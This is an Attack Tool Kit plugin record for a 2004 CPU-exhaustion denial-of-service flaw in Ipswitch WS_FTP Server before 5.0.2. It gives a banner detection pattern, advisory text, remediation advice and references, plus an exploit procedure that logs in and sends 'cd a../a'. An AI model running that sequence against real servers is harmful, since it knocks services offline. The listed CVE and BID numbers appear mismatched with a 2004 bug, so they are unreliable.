<plugin_id>114</plugin_id>
<plugin_name>Ipswitch WS_FTP Server prior 5.0.2 CWD path denial of service</plugin_name>
<plugin_family>FTP</plugin_family>
<plugin_created_date>2004/09/01</plugin_created_date>
<plugin_created_name>Marc Ruef</plugin_created_name>
<plugin_created_email>marc dot ruef at computec dot ch</plugin_created_email>
<plugin_created_web>http://www.computec.ch</plugin_created_web>
<plugin_created_company>computec.ch</plugin_created_company>
<plugin_updated_name>Marc Ruef</plugin_updated_name>
<plugin_updated_email>marc dot ruef at computec dot ch</plugin_updated_email>
<plugin_updated_web>http://www.computec.ch</plugin_updated_web>
<plugin_updated_company>computec.ch</plugin_updated_company>
<plugin_updated_date>2004/11/13</plugin_updated_date>
<plugin_version>1.2</plugin_version>
<plugin_changelog>Corrected the plugin structure and added the accuracy values in 1.2</plugin_changelog>
<plugin_protocol>tcp</plugin_protocol>
<plugin_port>21</plugin_port>
<plugin_procedure_detection>open|sleep|close|pattern_exists *WS_FTP Server [0-4].* OR *WS_FTP Server 5.0.[0-2]*</plugin_procedure_detection>
<plugin_procedure_exploit>open|sleep|send USER ftp\n|sleep|send PASS test@localhost\n|sleep|send cd a../a\n|sleep|close|pattern_exists *</plugin_procedure_exploit>
<plugin_detection_accuracy>80</plugin_detection_accuracy>
<plugin_exploit_accuracy>98</plugin_exploit_accuracy>
<plugin_comment>This plugin was written with the ATK Attack Editor.</plugin_comment>
<bug_published_name>lion</bug_published_name>
<bug_published_email>lion at cnhonker dot net</bug_published_email>
<bug_published_web>http://www.cnhonker.com</bug_published_web>
<bug_published_date>2004/08/30</bug_published_date>
<bug_advisory>http://packetstormsecurity.org/0408-advisories/wsFTP-DoS.txt</bug_advisory>
<bug_affected>Ipswitch WS_FTP Server prior 5.0.2</bug_affected>
<bug_not_affected>Ipswitch WS_FTP Server newer than 5.0.2 or other ftp servers</bug_not_affected>
<bug_vulnerability_class>Denial Of Service</bug_vulnerability_class>
<bug_description>The Ipswitch WS_FTP Server is a well-known ftp server for Windows operating systems. lion published a denial of service vulnerability in the version prior 5.0.2. So it is possible to increase the CPU usage of the server with the wrong path command "cd a../a". An user account is required to exploit this flaw.</bug_description>
<bug_solution>If the ftp server is not used it should be de-installed or de-activated. Install the newest patch or bugfix to solve the problem or upgrade to the latest software version which is not vulnerable anymore (http://www.ipswitch.com/Products/WS_FTP-Server/). Additionally limit unwanted connections and communications with firewalling.</bug_solution>
<bug_fixing_time>Approx. 20 minutes</bug_fixing_time>
<bug_exploit_availability>Yes</bug_exploit_availability>
<bug_exploit_url>http://packetstormsecurity.org/0408-advisories/wsFTP-DoS.txt</bug_exploit_url>
<bug_remote>Yes</bug_remote>
<bug_local>Yes</bug_local>
<bug_severity>Medium</bug_severity>
<bug_popularity>7</bug_popularity>
<bug_simplicity>8</bug_simplicity>
<bug_impact>7</bug_impact>
<bug_risk>7</bug_risk>
<bug_check_tool>The Attack Tool Kit provides an exploit and an detection plugin.</bug_check_tool>
<source_cve>CVE-1999-0362</source_cve>
<source_securityfocus_bid>217</source_securityfocus_bid>
<source_osvdb_id>937</source_osvdb_id>
<source_secunia_id>12406</source_secunia_id>
<source_scip_id>814</source_scip_id>
<source_nessus_id>14586</source_nessus_id>
<source_literature>Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427</source_literature>
<source_misc>http://www.computec.ch</source_misc>

